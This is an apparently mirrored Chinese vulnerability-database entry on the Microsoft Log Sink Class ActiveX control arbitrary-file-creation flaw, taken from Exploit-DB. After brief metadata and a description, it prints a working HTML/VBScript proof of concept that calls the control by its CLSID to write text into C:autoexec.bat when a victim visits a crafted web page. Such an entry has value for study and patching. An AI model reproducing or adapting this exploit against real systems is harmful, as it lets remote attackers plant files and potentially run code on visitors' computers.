Microsoft Log Sink Class – ActiveX Control Arbitrary File Creation

Microsoft Log Sink Class – ActiveX Control Arbitrary File Creation

漏洞ID 1053858 漏洞类型
发布时间 2003-04-29 更新时间 2003-04-29
图片[1]-Microsoft Log Sink Class – ActiveX Control Arbitrary File Creation-安全小百科CVE编号 N/A
图片[2]-Microsoft Log Sink Class – ActiveX Control Arbitrary File Creation-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25157
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/12646/info

Microsoft Log Sink Class ActiveX control can allow remote attackers to create arbitrary files on an affected computer.

A remote attacker can exploit this issue by crafting a malicious Web site that triggers this vulnerability and enticing a user to visit the site. If successful, the attacker may create arbitrary files on the computer. This may lead to various attacks including arbitrary code execution. 

<object id=ctl
classid="clsid:{DE4735F3-7532-4895-93DC-9A10C4257173}"></object>
<script language="vbscript">
ctl.initsink "C:autoexec.bat"
ctl.addstring "echo Drive formatted? ", ""
ctl.deinitsink
</script>

相关推荐: Unix Oracle文件覆盖漏洞

Unix Oracle文件覆盖漏洞 漏洞ID 1205021 漏洞类型 未知 发布时间 2001-12-06 更新时间 2001-12-06 CVE编号 CVE-2001-0832 CNNVD-ID CNNVD-200112-077 漏洞平台 N/A CVSS…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享